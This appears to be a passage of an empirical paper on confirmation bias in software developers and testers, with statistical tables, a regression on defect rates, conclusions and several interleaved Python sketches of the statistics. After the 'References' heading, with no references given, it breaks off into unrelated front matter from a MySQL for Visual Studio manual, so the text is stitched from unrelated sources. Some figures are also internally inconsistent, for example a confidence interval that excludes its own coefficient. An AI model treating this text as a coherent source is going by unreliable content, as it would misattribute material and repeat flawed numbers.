In order to perform empirical analysis, we defined a set of metrics in addition to the metrics and methodologies we inherited from the cognitive psychology literature. Other than Wason’s eliminative/enumerative index (Ind_Elim/Enum), all of the metrics have been defined by us.
Among the interactive test metrics, the total time it takes to discover the correct rule (T_I) and the total number of rule discovery attempts (N_A) are performance metrics. On the other hand, the frequency of immediate rule announcements (F_IR), the average length of consecutive immediate rule announcements (avg_L_IR) and the average frequency of reason repetition/reformulation (avg_F_RR) are intended to measure the extent of experimental procedure violation. The experimental procedure does not allow immediate rule announcements; however, during the interactive tests some subjects made immediate rule announcements, although they had been told the experimental procedure at the beginning.
Written test metrics measure performance in the different sections of the written test: the score in abstract questions (S_ABS), in thematic questions (S_Th) and in questions with a software development/testing theme (S_SW). Each score metric is calculated as the ratio of the number of correctly answered questions to the total number of questions in the corresponding section. In addition, the total duration it takes to solve the thematic and abstract sections (T_Th+ABS) and the duration it takes to solve the sections with a software development/testing theme (T_SW) are among the written test metrics. All of the metrics are given in Table 2 together with their explanations.
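Each score metric is a simple fraction of correct answers per section; a minimal sketch (invented answer data, hypothetical helper name):

```python
# Written-test score metrics (S_ABS, S_Th, S_SW): the fraction of
# correctly answered questions in a section. `answers` holds a
# subject's responses, `key` the correct answers, position by position.
def section_score(answers, key):
    """Ratio of correct answers to the number of questions in a section."""
    return sum(a == k for a, k in zip(answers, key)) / len(key)

# e.g. 3 of 4 abstract questions correct -> S_ABS = 0.75
s_abs = section_score(["A", "C", "B", "D"], ["A", "B", "B", "D"])
```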
5. DATA
We administered both interactive and written tests to two different groups of subjects.
The first group (Group 1) consists of 28 computer engineering graduate students of Bogazici University. 14 of the subjects in Group 1 have software development experience in various companies, with an average of 2.51 years. Among the subjects with above-average software development experience, 6 are still active: they develop embedded software for autonomous robots for RoboCup, an international robotics competition founded in 1993.
Members of Group 2 are software developers/testers working in a large scale telecommunication company in Europe. Unlike the subjects of Group 1, this group of subjects has only undergraduate degrees, in Computer Engineering, Mathematics and related fields. There are two different project groups within Group 2. The first project group, which employs the traditional waterfall software development methodology, consists of 28 subjects; 12 of them are developers, while 16 of them are testers. The second project group consists of 8 subjects who develop software using the TSP/PSP methodology.
Table 2. Interactive and written test metrics with their abbreviations
<table>
<thead>
<tr>
<th colspan="2">Interactive Test Metrics</th>
</tr>
<tr>
<th>Abbr.</th>
<th>Metric Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ind_Elim/Enum</td>
<td>Wason’s eliminative/enumerative index [5]</td>
</tr>
<tr>
<td>T_I</td>
<td>Total time it took to discover the correct rule</td>
</tr>
<tr>
<td>F_IR</td>
<td>Immediate rule announcement frequency</td>
</tr>
<tr>
<td>avg_L_IR</td>
<td>Average length of consecutive immediate rule announcements (rule announcements in a series with no instances given in between)</td>
</tr>
<tr>
<td>avg_F_RR</td>
<td>Average frequency of reason repetition/reformulation</td>
</tr>
<tr>
<td>N_A</td>
<td>Total number of rule discovery attempts including the correct rule announcement</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th colspan="2">Written Test Metrics</th>
</tr>
<tr>
<th>Abbr.</th>
<th>Metric Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>S_ABS</td>
<td>Score in abstract questions</td>
</tr>
<tr>
<td>S_Th</td>
<td>Score in thematic questions</td>
</tr>
<tr>
<td>T_Th+ABS</td>
<td>Duration it took to solve abstract and thematic questions (minutes)</td>
</tr>
<tr>
<td>S_SW</td>
<td>Score in questions with software development/testing theme</td>
</tr>
<tr>
<td>T_SW</td>
<td>Duration it took to solve questions with software development/testing theme (minutes)</td>
</tr>
</tbody>
</table>
1 Abbr. stands for "Abbreviation".
6. RESULTS
This section consists of two parts. In the first part, the effects of factors such as education, experience in software development/testing and software development methodologies, on confirmation bias are analyzed. In the second part, we investigate the effects of confirmation bias on software development and testing.
6.1 Analysis of the Factors Affecting Confirmation Bias
6.1.1 Effect of Education on Confirmation Bias
As shown in Figure 1, according to Reich and Ruth’s classification method, there are more falsifiers and fewer verifiers in Group 1 compared to Group 2. These results imply that the subjects of Group 1 exhibit lower confirmation bias levels. In addition, the existence of matchers only in Group 2 (13.16% of the Group 2 population) supports the claim that members of Group 1 use more logical reasoning. These results are in favor of the Group 1 members, who are graduate computer engineering students and are obliged to take theoretical computer science courses as part of the graduate curriculum. It is highly probable that these courses helped the Group 1 members gain logical reasoning skills, since they frequently encounter the fact that a given statement does not always have to be true and hence may need to be disproved. In other words, Group 1 members have been trained to lower their confirmation bias levels through courses that require logical reasoning.
Figure 1. Distribution of falsifiers, verifiers, and matchers in Group 1 and Group 2 according to Reich and Ruth’s method.
6.1.2 Effect of Software Development/Testing Experience on Confirmation Bias
In order to see how confirmation bias levels are affected by experience in software development/testing, we performed three different analyses. In our first analysis, we compared interactive and written test metric values of two subgroups within Group 1. The first subgroup (Group1_EXP) consists of subjects who have worked in software development industry for more than or equal to 2.51 years, which is the average years of experience among Group 1 members. The rest of the subjects are categorized under the second subgroup (Group1_NEXP). In order to compare interactive and written test metric values of Group1_EXP and...
Group1_NEXP, we performed a bootstrapped Kolmogorov-Smirnov test. As shown in Table 3, the only significant difference obtained is in the scores of the written-test questions with a software development and testing theme ($S_{SW}$). Members of the experienced group scored significantly higher, since in the written test they used software development knowledge gained through experience in addition to logical reasoning.
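The bootstrapped two-sample Kolmogorov-Smirnov test can be sketched as follows. This is a minimal pure-Python illustration, not the authors' implementation: under the null hypothesis of a common distribution, we resample both groups from the pooled data and count how often the resampled statistic reaches the observed one.

```python
import random

def ks_statistic(a, b):
    """Two-sample Kolmogorov-Smirnov statistic: the maximum absolute
    difference between the two empirical CDFs."""
    a, b = sorted(a), sorted(b)
    def ecdf(sample, x):
        return sum(v <= x for v in sample) / len(sample)
    return max(abs(ecdf(a, x) - ecdf(b, x)) for x in a + b)

def bootstrap_ks_pvalue(a, b, n_boot=2000, seed=0):
    """Bootstrapped p-value: resample from the pooled data (the null
    hypothesis of a common distribution). Unlike the asymptotic KS
    p-value, this remains valid for discontinuous distributions."""
    rng = random.Random(seed)
    observed = ks_statistic(a, b)
    pooled = list(a) + list(b)
    hits = 0
    for _ in range(n_boot):
        ra = [rng.choice(pooled) for _ in a]
        rb = [rng.choice(pooled) for _ in b]
        if ks_statistic(ra, rb) >= observed:
            hits += 1
    return hits / n_boot
```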
In the second analysis, we employed the Reich and Ruth categorization method. The distribution of falsifiers and verifiers, as well as the subjects that could not be categorized, is shown in Figure 2. 64.29% of the experienced members of Group 1 and 57.29% of the less experienced members are falsifiers, while 21.43% of the experienced and 7.14% of the less experienced members are verifiers. This distribution implies no significant difference between the experienced and less experienced members of Group 1.
In the third analysis, we statistically compared the experienced members of Group 2 (Group2_EXP) and the less experienced members of Group 2 (Group2_NEXP). Group2_EXP consists of Group 2 members who have more than or equal to 5.71 years of experience, which is the average years of experience in software development/testing among Group 2 members. As shown in Table 4, no significant difference was found among the members of Group2_EXP and Group2_NEXP.

We then split the experienced members of Group 1 into those who are still active in software development/testing (Group1_ACTIVE) and those who are not active anymore and are mostly engaged in research studies (Group1_INACTIVE). Table 5 shows the statistical comparison of the metric values for Group1_ACTIVE and Group1_INACTIVE. As can be seen, no significant difference has been observed in the metric values within the 0.05 significance level.

We have also categorized the members of Group1_ACTIVE and Group1_INACTIVE separately as falsifiers, verifiers and matchers according to Reich and Ruth’s method. In both subgroups, subjects that could not be categorized according to Reich and Ruth’s scheme are labeled as None. As previously mentioned and shown in Figure 1, no matchers were found among the members of Group 1; hence, we cannot observe any matchers in Figure 3 either. However, the results seem in favor of the Group1_INACTIVE members, as a higher portion of the Group1_INACTIVE population is falsifiers and a lower portion is verifiers when
Table 4. Results of the bootstrapped Kolmogorov-Smirnov test among experienced and less experienced members of Group 2.
<table>
<thead>
<tr>
<th></th>
<th>Group 2_EXP</th>
<th>Group 2_NEXP</th>
<th>p-value</th>
</tr>
</thead>
<tbody>
<tr>
<td>$Ind_{Elim/Enum}$</td>
<td>1.11</td>
<td>1.12</td>
<td>0.6899</td>
</tr>
<tr>
<td>$T_I$</td>
<td>18.06</td>
<td>16.59</td>
<td>0.3874</td>
</tr>
<tr>
<td>$F_{IR}$</td>
<td>1.00</td>
<td>0.67</td>
<td>1.0000</td>
</tr>
<tr>
<td>$avg\_L_{IR}$</td>
<td>0.55</td>
<td>0.53</td>
<td>1.0000</td>
</tr>
<tr>
<td>$avg\_F_{RR}$</td>
<td>1.17</td>
<td>0.80</td>
<td>0.8644</td>
</tr>
<tr>
<td>$N_A$</td>
<td>3.61</td>
<td>2.18</td>
<td>0.1170</td>
</tr>
<tr>
<td>$S_{ABS}$</td>
<td>0.19</td>
<td>0.13</td>
<td>0.3874</td>
</tr>
<tr>
<td>$S_{Th}$</td>
<td>0.72</td>
<td>0.71</td>
<td>0.9313</td>
</tr>
<tr>
<td>$T_{Th+ABS}$</td>
<td>18.12</td>
<td>14.5</td>
<td>0.2336</td>
</tr>
<tr>
<td>$S_{SW}$</td>
<td>0.46</td>
<td>0.53</td>
<td>0.9303</td>
</tr>
<tr>
<td>$T_{SW}$</td>
<td>17.59</td>
<td>14.41</td>
<td>0.3874</td>
</tr>
</tbody>
</table>
compared to the falsifier and verifier portions within the Group1_ACTIVE population.
When we consider Figure 1 and Figure 3 together, we can make the following observation: among groups whose members are active in software development/testing, a lower portion of falsifiers and a higher portion of verifiers are observed. This is an undesired situation, as it implies high confirmation bias levels. In order to investigate this claim further, we conducted the following analysis: we removed the 6 members who are still active in software development/testing from Group 1 and named the resulting group Group 1’.
We used Reich and Ruth’s categorization method on the members of this group and compared the distribution of falsifiers, verifiers and matchers within Group 1’ with the one in Group 2. Figure 4 shows the resulting categorization, where a higher portion of the Group 1’ population is falsifiers, whereas verifiers form a lower portion, compared to the falsifier and verifier portions of Group 2.
Table 5. Results of the bootstrapped Kolmogorov-Smirnov test among active and inactive experienced members of Group 1.
<table>
<thead>
<tr>
<th>Metric</th>
<th>Group1 ACTIVE</th>
<th>Group1 INACTIVE</th>
<th>p-value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ind_Elim/Enum</td>
<td>0.9160</td>
<td>1.5178</td>
<td>0.4505</td>
</tr>
<tr>
<td>T_I</td>
<td>10.4000</td>
<td>7.6667</td>
<td>0.7160</td>
</tr>
<tr>
<td>F_IR</td>
<td>0.0000</td>
<td>0.2222</td>
<td>0.0505</td>
</tr>
<tr>
<td>avg_L_IR</td>
<td>0.0000</td>
<td>0.2222</td>
<td>0.0515</td>
</tr>
<tr>
<td>avg_F_RR</td>
<td>1.1000</td>
<td>0.4444</td>
<td>0.3890</td>
</tr>
<tr>
<td>N_A</td>
<td>1.2000</td>
<td>2.1111</td>
<td>0.6920</td>
</tr>
<tr>
<td>S_ABS</td>
<td>0.5870</td>
<td>0.5300</td>
<td>0.5780</td>
</tr>
<tr>
<td>S_Th</td>
<td>0.8600</td>
<td>0.8667</td>
<td>0.3595</td>
</tr>
<tr>
<td>T_Th+ABS</td>
<td>16.6667</td>
<td>14.7778</td>
<td>0.5870</td>
</tr>
<tr>
<td>S_SW</td>
<td>0.8417</td>
<td>0.7689</td>
<td>0.3350</td>
</tr>
<tr>
<td>T_SW</td>
<td>12.6667</td>
<td>10.1111</td>
<td>0.4910</td>
</tr>
</tbody>
</table>
6.1.3 Effect of Waterfall and TSP/PSP Software Development Methodologies on Confirmation Bias
In order to analyze the effect of the waterfall and TSP/PSP software development methodologies, we statistically compared the interactive and written test metric values for two subgroups within Group 2. As mentioned previously, 28 members of Group 2 are software developers/testers assigned to a software development project using the regular waterfall methodology. The remaining 8 members of Group 2 (Group2_TSP/PSP) are responsible for a pilot software development project following the TSP/PSP methodology. Among the members of the TSP/PSP group, 3 gave up the interactive test before discovering the correct rule. The interactive test metrics $T_I$ and $N_A$ can be measured only when a subject succeeds in discovering the correct rule, so only 5 values exist for each of these metrics, which is unlikely to give accurate results. Hence, the $T_I$ and $N_A$ metrics have been excluded from the statistical comparison of metric values between these two groups.
Figure 3. Distribution of falsifiers, verifiers, and matchers among the experienced active and experienced inactive members of Group 1 according to Reich and Ruth’s method.
Figure 4. Distribution of falsifiers, verifiers, and matchers among members of Group 1’ and Group 2 according to Reich and Ruth’s method.
During our analysis, we took into account only the 12 developers of Group 2 who develop software based on the waterfall methodology and named this subgroup Group2_REGULAR. As shown in Table 6, no significant statistical difference was found between the two subgroups. As we can see in Figure 5, according to the Reich and Ruth classification scheme, a higher portion of falsifiers and a lower portion of verifiers are observed in Group2_REGULAR compared to the falsifier and verifier portions of the Group2_TSP/PSP population. These results seem in favor of Group2_REGULAR. However, 8.33% of Group2_REGULAR are matchers, who do not excel at logical reasoning. Moreover, in both subgroups
Group2_{REGULAR} and Group2_{TSP/PSP}, a high portion of uncategorized subjects are observed.

6.2 Analysis of the Effects of Confirmation Bias on Software Development and Testing Performances
6.2.1 Effect of Confirmation Bias on Software Development Performance
We performed an analysis among 28 members of Group 2, who all belong to a project group responsible for the development of a customer services software package. Within this project group, which develops software according to the traditional waterfall methodology, the software testing team consists of 11 software testers, while the remaining 17 subjects are software developers. Every two weeks a new release of the software is delivered; hence the testing phase of one release and the development phase of the next release overlap. In this study, we analyzed 10 releases of the software that were developed and tested between the last week of May 2009 and the second week of November 2009. For each release, we categorized each file as defective or not based on the results of the testing phase for that release. Moreover, a file that was updated or created within a specific release but not updated during the following releases was also categorized as defective if defects were found in that file during the testing phases of the following releases. For defects detected within a file during each testing phase, the developers who created or updated that file before that testing phase were held responsible.
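The release-based labeling rule above can be sketched as follows (invented data shapes and a hypothetical helper name; not the authors' tooling): a file touched in release r stays attributed to that release until it is touched again, and is labeled defective if a defect surfaces in any testing phase in that window.

```python
# Label (release, file) pairs as defective. `touched` holds pairs where
# the file was created/updated; `defects` holds pairs where a defect was
# found during that release's testing phase.
def label_files(touched, defects, n_releases):
    defective = set()
    for (r, f) in touched:
        for r2 in range(r, n_releases):
            if (r2, f) in defects:
                defective.add((r, f))
                break
            if r2 > r and (r2, f) in touched:
                break  # file updated again: later defects belong to that update
    return defective
```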
Based on the commit history of the files comprising the software package, we discovered that most of the files were updated by more than one developer. In other words, each file is developed by a group of one or more developers. As a result of the churn data analysis, we found 124 developer groups, and for each developer group we evaluated the defective file percentage among all the files created or updated by that group. The defective file percentage of each group is the measure we selected to assess the performance of each group of software developers. For each developer group, we also evaluated the average, minimum and maximum values of the 11 confirmation bias metrics listed in Table 2. In addition to the confirmation bias metrics, we took into account the average, minimum and maximum test severity values to assess the hypothesis testing performance of a subject during the interactive test. Our method to evaluate the confirmation bias related parameters can be formulated as follows:
\[
\begin{align*}
X_1 &= \mathrm{Ind}_{Elim/Enum}^{1 \cdots N} \\
X_2 &= \mathrm{Ind}_{Elim/Enum,\,last}^{1 \cdots N} \\
X_3 &= T_{I}^{1 \cdots N} \\
X_4 &= F_{IR}^{1 \cdots N} \\
X_5 &= avg\_L_{IR}^{1 \cdots N} \\
X_6 &= avg\_F_{RR}^{1 \cdots N} \\
X_7 &= N_{A}^{1 \cdots N} \\
X_8 &= S_{ABS}^{1 \cdots N} \\
X_9 &= S_{Th}^{1 \cdots N} \\
X_{10} &= T_{Th+ABS}^{1 \cdots N} \\
X_{11} &= S_{SW}^{1 \cdots N} \\
X_{12} &= T_{SW}^{1 \cdots N} \\
X_{13} &= TestSeverity_{avg}^{1 \cdots N} \\
X_{14} &= TestSeverity_{max}^{1 \cdots N} \\
X_{15} &= TestSeverity_{min}^{1 \cdots N}
\end{align*}
\]
\[
X_{avg} = \left[ \frac{\sum_{i=1}^{N} X_{1}^{i}}{N} \;\cdots\; \frac{\sum_{i=1}^{N} X_{15}^{i}}{N} \right] \quad (1)
\]
\(X_1\) and \(X_3\) through \(X_{12}\) are the confirmation bias metrics given in Table 2, while \(X_2\) is the elimination/enumeration index taking into account only the last rule announcement instead of every rule announcement made by the subject. Finally, \(X_{13}\), \(X_{14}\) and \(X_{15}\) are respectively the average, maximum and minimum test severities of the developers in a given group. The superscript \(1 \cdots N\) denotes the vector of values over the \(N\) developers in a group.
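The aggregation above can be illustrated with a minimal Python sketch (hypothetical data and helper names, not the authors' tooling): group files by the set of developers who touched them, then compute each group's defective-file percentage and the avg/min/max of a per-developer metric.

```python
from collections import defaultdict

def group_stats(file_devs, file_defective, dev_metric):
    """file_devs: file -> set of developer ids; file_defective:
    file -> bool; dev_metric: developer -> one metric value.
    Returns per-developer-group defective percentage and avg/min/max
    of the metric over the group's members."""
    groups = defaultdict(list)
    for f, devs in file_devs.items():
        groups[frozenset(devs)].append(file_defective[f])
    stats = {}
    for devs, flags in groups.items():
        metrics = [dev_metric[d] for d in devs]
        stats[devs] = {
            "defective_pct": 100.0 * sum(flags) / len(flags),
            "avg": sum(metrics) / len(metrics),
            "min": min(metrics),
            "max": max(metrics),
        }
    return stats
```

In the paper the same avg/min/max aggregation is applied to all 15 parameters per group; the sketch shows it for one.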
Having evaluated the confirmation bias related parameters of the developer groups, we performed multiple linear regression modeling to find the relation between confirmation bias and the percentage of defective files.
\[ y = X\beta + \varepsilon \quad (3) \]
Table 7. The values of regression coefficients with their confidence intervals.
<table>
<thead>
<tr>
<th>Coefficient</th>
<th>Coefficient Value</th>
<th>Confidence Interval</th>
<th>p value</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \beta_1 )</td>
<td>6.5669</td>
<td>6.0569 - 7.0688</td>
<td>1.0791E-12</td>
</tr>
<tr>
<td>( \beta_2 )</td>
<td>0.2696</td>
<td>0.0507 - 0.4896</td>
<td>0.0162</td>
</tr>
<tr>
<td>( \beta_3 )</td>
<td>-0.1472</td>
<td>-0.4809 - 1.1866</td>
<td>0.3843</td>
</tr>
<tr>
<td>( \beta_4 )</td>
<td>1.4814</td>
<td>1.0971 - 1.8657</td>
<td>6.543E-12</td>
</tr>
<tr>
<td>( \beta_5 )</td>
<td>0.6248</td>
<td>0.0496 - 1.2000</td>
<td>0.0335</td>
</tr>
<tr>
<td>( \beta_6 )</td>
<td>-1.2697</td>
<td>-1.9005 - -0.6309</td>
<td>1.167E-4</td>
</tr>
</tbody>
</table>
Since the existence of linear dependencies among the parameters leads to a matrix singularity problem, we performed principal component analysis (PCA). Hence, we constructed a multiple linear regression model with 5 parameters (i.e. \( \beta_2, \beta_3, \beta_4, \beta_5, \beta_6 \)), which correspond to linear combinations of the averaged confirmation bias related parameters (i.e. \( X = X_{avg} \)). The coefficients for the parameters that turned out to contribute significantly to the model, together with their confidence intervals at the \( \alpha = 0.05 \) significance level, are shown in Table 7. The R\(^2\) statistic is 0.4477 and the adjusted R\(^2\) statistic is 0.4243, which implies that about 42% of the variability in defect percentage is explained by the parameters given in Table 7. Taking into account the fact that defect rate is affected by process factors and many human attributes other than confirmation bias, the results obtained are quite significant.
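The modeling step can be sketched as ordinary least squares for \( y = X\beta + \varepsilon \) via the normal equations, plus the R\(^2\) statistic. This is a minimal pure-Python illustration; the paper additionally applies PCA first to remove linear dependencies, which is omitted here.

```python
def ols(X, y):
    """Solve (X^T X) beta = X^T y by Gaussian elimination with partial
    pivoting. X is a list of rows; a leading 1 in each row gives an
    intercept term."""
    p = len(X[0])
    A = [[sum(r[i] * r[j] for r in X) for j in range(p)] for i in range(p)]
    b = [sum(r[i] * yi for r, yi in zip(X, y)) for i in range(p)]
    for c in range(p):                      # forward elimination
        piv = max(range(c, p), key=lambda r: abs(A[r][c]))
        A[c], A[piv] = A[piv], A[c]
        b[c], b[piv] = b[piv], b[c]
        for r in range(c + 1, p):
            f = A[r][c] / A[c][c]
            for k in range(c, p):
                A[r][k] -= f * A[c][k]
            b[r] -= f * b[c]
    beta = [0.0] * p
    for c in reversed(range(p)):            # back substitution
        beta[c] = (b[c] - sum(A[c][k] * beta[k] for k in range(c + 1, p))) / A[c][c]
    return beta

def r_squared(X, y, beta):
    """Fraction of the variability in y explained by the fitted model."""
    yhat = [sum(bk * x for bk, x in zip(beta, row)) for row in X]
    ybar = sum(y) / len(y)
    ss_res = sum((yi - yh) ** 2 for yi, yh in zip(y, yhat))
    ss_tot = sum((yi - ybar) ** 2 for yi in y)
    return 1 - ss_res / ss_tot
```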
6.3 Analysis of the Effects of Confirmation Bias on Tester Performance
In this part of our work, we analyzed the effect of confirmation bias on tester performance. For this purpose, we inherited two tester performance metrics from the tester competence reports of the company where the members of Group 2 are employed. These metrics are the number of bugs reported \((N_{BUG})\) and the number of production defects caused \((N_{PROD\_DEF})\) by each tester. Production defects are defects that could not be detected by testers during the testing phase and are revealed by customers after the software is released. We grouped the members of Group 2 based on the values of \(N_{BUG}\) and \(N_{PROD\_DEF}\).
Figure 6 shows the Vincent curves for the test severity values of two groups of testers, grouped according to whether they reported an above-average or below-average number of bugs. Contrary to what we expected, the group of testers reporting a below-average number of bugs exhibited a more strategic approach during the interactive confirmation bias tests: they start with a test of low severity and progressively exclude more alternatives [6]. Moreover, starting from the second percentile of the instances given during the interactive tests, the test severity of the tester group with a below-average \(N_{BUG}\) value is always higher than that of the other group. In other words, for each instance given by members of this group during the interactive test, more alternative hypotheses are eliminated. We can draw an analogy between the hypothesis testing strategies exhibited during the interactive confirmation bias tests and testing strategies during software testing: the testers with a below-average \(N_{BUG}\) value seem to run tests that eliminate more software failure scenarios during the software testing phase. However, such behavior would be expected to result in finding more of the bugs in the code.
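A Vincent curve averages sequences of different lengths by rescaling each subject's test-severity sequence to a common number of percentile bins before averaging. A minimal sketch (hypothetical helper name; linear interpolation is one common choice, not necessarily the authors'):

```python
def vincent_curve(sequences, bins=10):
    """Rescale each sequence to `bins` points by linear interpolation,
    then average across subjects point by point."""
    curves = []
    for seq in sequences:
        n = len(seq)
        curve = []
        for b in range(bins):
            pos = b * (n - 1) / (bins - 1)   # bin position in this sequence
            lo, hi = int(pos), min(int(pos) + 1, n - 1)
            frac = pos - int(pos)
            curve.append(seq[lo] * (1 - frac) + seq[hi] * frac)
        curves.append(curve)
    return [sum(c[b] for c in curves) / len(curves) for b in range(bins)]
```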

In order to explain this, we analyzed the relationship between total number of bugs reported \((N_{BUG})\) and total number of production defects caused by each tester \((N_{PROD_DEF})\). The Spearman correlation value between these two variables is 0.8234, where +1 or -1 occurs when each of the variables is a perfect monotone function of the other. As shown in Figure 8, while the total number of bugs reported by a tester increases, total number of production defects introduced by that tester also increases.
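The reported Spearman rank correlation is the Pearson correlation of the ranks, with ties receiving average ranks. A minimal pure-Python sketch (invented data in the test; not the authors' code):

```python
def ranks(xs):
    """Ranks starting at 1; tied values share their average rank."""
    order = sorted(range(len(xs)), key=lambda i: xs[i])
    r = [0.0] * len(xs)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and xs[order[j + 1]] == xs[order[i]]:
            j += 1
        avg = (i + j) / 2 + 1            # average rank of the tie group
        for k in range(i, j + 1):
            r[order[k]] = avg
        i = j + 1
    return r

def spearman(x, y):
    """Pearson correlation of the rank vectors of x and y."""
    rx, ry = ranks(x), ranks(y)
    mx, my = sum(rx) / len(rx), sum(ry) / len(ry)
    num = sum((a - mx) * (b - my) for a, b in zip(rx, ry))
    den = (sum((a - mx) ** 2 for a in rx) * sum((b - my) ** 2 for b in ry)) ** 0.5
    return num / den
```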
The high correlation between the total number of reported bugs and the production defect count may indicate another phenomenon: testers who report more bugs might be assigned code with very high defect density, requiring immense testing effort. However, for each tester there is also time pressure to end the testing procedure, and this may result in the deployment of defective code. Another explanation for the outcome shown in Figure 8 is that bugs are not classified according to their severities; hence, a large number of reported bugs does not necessarily mean that a significant portion of severe bugs has been reported.
Moreover, as shown in Figure 10, testers who report more bugs than the average number of reported bugs are less likely to follow a testing strategy in terms of test severity during the interactive tests. A reasonable testing strategy, suggested by Poletiek, is to start with a test of low severity and to progressively increase test severity [6]. The test severity curve of the testers who report fewer bugs than the average is in line with Poletiek’s testing strategy, compared to the curve of the testers who report bugs above average. In addition, once the percentage of total instances given by subjects during the interactive test exceeds 10%, the test severity of the testers who report bugs below average is always higher.
This outcome of the interactive test suggests that these testers are more likely to follow Poletiek’s testing strategy during software testing, so that initially less severe tests are made. Hence fewer bugs are detected at first, yet the tester gains an idea of the sections of the code that must be tested and the possible defect types. As a result, the tester can increase the severity of his/her tests, which leads to finding more bugs that are severe.
6.4 Threats to Validity
We would like to address internal, external, construct, and statistical validity.
In terms of internal validity, our quasi-independent variables are experience, education, activeness in software development, and software development methodology. The measures for these variables, which are the confirmation bias metrics, were taken within a week for both Group 1 and Group 2. Moreover, within either group there was no event between the confirmation bias tests that could affect the subjects’ performance.
However, problems may arise due to different experimental conditions. For instance, compared to graduate computer engineering students, the stress factor of company workers, who always have to rush for the next release, may have biased the results. In order to avoid mono-operation bias as a construct validity threat, we used more than a single dependent variable: we extracted metrics from both written and interactive tests as well as Wason’s elimination/enumeration index [5]. As a result, we avoided under-representing the construct and got rid of irrelevancies.
We have used two datasets to externally validate our results, and we will continue expanding the size and variety of our dataset going forward.
Figure 8. High correlation between production defect and total number of reported bugs (Spearman rank correlation: 0.8234 )
Figure 9. Distribution of falsifiers, verifiers, and matchers among testers who report bugs above and below average amount, according to Reich and Ruth’s method.
Finally, as shown in Figure 9, all falsifiers are among testers who report bugs below average, whereas a higher portion of the testers who report bugs above average are verifiers. This result brings about the possibility that testers who report bugs above average exhibit more tendency to verify that production defects do not exist in the codes they test. Therefore, they exhibit confirmation bias in this sense.
The distribution of falsifiers, verifiers and matchers for testers who cause production defects above and below average is also in line with the distribution given in Figure 11. In addition, as shown in Figure 10, test severity curves for testers who cause production defects below and above average exhibit a behavior similar to the curves in Figure 6.
Figure 10. Vincent curves for test severity of testers who cause production defect above and below average respectively.
We used bootstrapped Kolmogorov-Smirnov tests to statistically validate our results. We chose this test since we do not have any prior knowledge of the distribution of the metric values and the underlying distributions are discontinuous.
7. CONCLUSION AND FUTURE WORK
During all levels of software testing, the attempt should be to fail the code in order to reduce software defect density. In an early work, Teasley et al. empirically showed that, due to confirmation bias, people have more tendency to make positive tests rather than negative tests during the software testing phase [8]. In order to empirically analyze the effect of confirmation bias on software defect density, we need to measure/quantify confirmation bias. In this study, we prepared both interactive and written tests based on Wason’s experiments, which have been replicated for decades. However, to the best of our knowledge and unlike in other disciplines, Wason’s experiments have not been used in the field of software testing and development. Having administered our tests to the testers and developers of a large scale telecommunication company in Europe, as well as to a group of computer engineering graduate students, we analyzed the test results based on the existing work in the cognitive psychology literature as well as the metrics we defined. Our results can be summarized as follows:
- Confirmation bias levels of individuals who have been trained in logical reasoning and mathematical proof techniques are significantly lower. In other words, given a statement such individuals show tendency to refute that statement rather than immediately accepting its correctness.
- A significant effect of experience in software development/testing has not been observed. This implies that training in organizations is focused on tasks rather than personal skills. Considering that the percentage of people with low confirmation bias is very low in the population [5, 6, 7], an organization should find ways to improve basic logical reasoning and strategic hypothesis testing skills of their software developers/testers.
- Individuals who are experienced but inactive in software development/testing score better in confirmation bias tests than active, experienced software developers/testers. This implies that companies should balance the work schedules of testers, much as airlines do for pilots, and periodically allow them to take some time off from the regular routine.
- Another finding is that we do not observe any difference in confirmation bias levels in favor of the TSP/PSP team. This raises a question about the validity of models such as TSP/PSP that promise defect-free and high quality software development.
- High levels of defect rates introduced by software developers are directly related to confirmation bias.
- High levels of confirmation bias among software testers are very likely to result in an increase in the number of production defects.
As future work, we plan to extend our dataset and replicate this study in other software development companies. Moreover, we will construct software defect prediction models that use confirmation bias metrics as a people-related set of metrics, in addition to product and process metrics. It is highly probable that confirmation bias metrics would improve the prediction performance of the learning based defect prediction models that we have been building for over a decade.
8. ACKNOWLEDGMENTS
This research is supported in part by Turkish Scientific Research Council, TUBITAK, under grant number EEEAG108E014.
9. REFERENCES
MySQL for Visual Studio
Abstract
This is the MySQL™ for Visual Studio Reference Manual. It documents MySQL for Visual Studio through release 1.2.8.
For notes detailing the changes in each release, see the MySQL for Visual Studio Release Notes.
For legal information, see the Legal Notices.
For help with using MySQL, please visit either the MySQL Forums or MySQL Mailing Lists, where you can discuss your issues with other MySQL users.
**Licensing information.** This product may include third-party software, used under license. If you are using a Commercial release of MySQL for Visual Studio, see the MySQL for Visual Studio Commercial License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Commercial release. If you are using a Community release of MySQL for Visual Studio, see the MySQL for Visual Studio Community License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Community release.
Document generated on: 2018-11-14 (revision: 59964)
# Table of Contents
Preface and Legal Notices
1 General Information
1.1 New in Version 2.0
1.2 New in Version 1.2
2 Installing MySQL for Visual Studio
3 The MySQL Toolbar
4 Making a Connection
5 Editing
5.1 MySQL SQL Editor
5.2 Code Editors
5.3 Editing Tables
5.3.1 Column Editor
5.3.2 Column Properties
5.3.3 Table Properties
5.4 Editing Views
5.5 Editing Indexes
5.6 Editing Foreign Keys
5.7 Editing Stored Procedures and Functions
5.8 Editing Triggers
6 MySQL Website Configuration Tool
7 MySQL Project Items
7.1 Minimum Requirements
7.2 MySQL ASP.NET MVC Items
7.3 MySQL Windows Forms Items
8 MySQL Data Export Tool
9 Using the ADO.NET Entity Framework
10 DDL T4 Template Macro
11 Debugging Stored Procedures and Functions
A MySQL for Visual Studio Frequently Asked Questions
Preface and Legal Notices
This is the User Manual for the MySQL for Visual Studio.
**Licensing information.** This product may include third-party software, used under license. If you are using a Commercial release of MySQL for Visual Studio, see the MySQL for Visual Studio Commercial License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Commercial release. If you are using a Community release of MySQL for Visual Studio, see the MySQL for Visual Studio Community License Information User Manual for licensing information, including licensing information relating to third-party software that may be included in this Community release.
**Legal Notices**
Copyright © 2004, 2018, Oracle and/or its affiliates. All rights reserved.
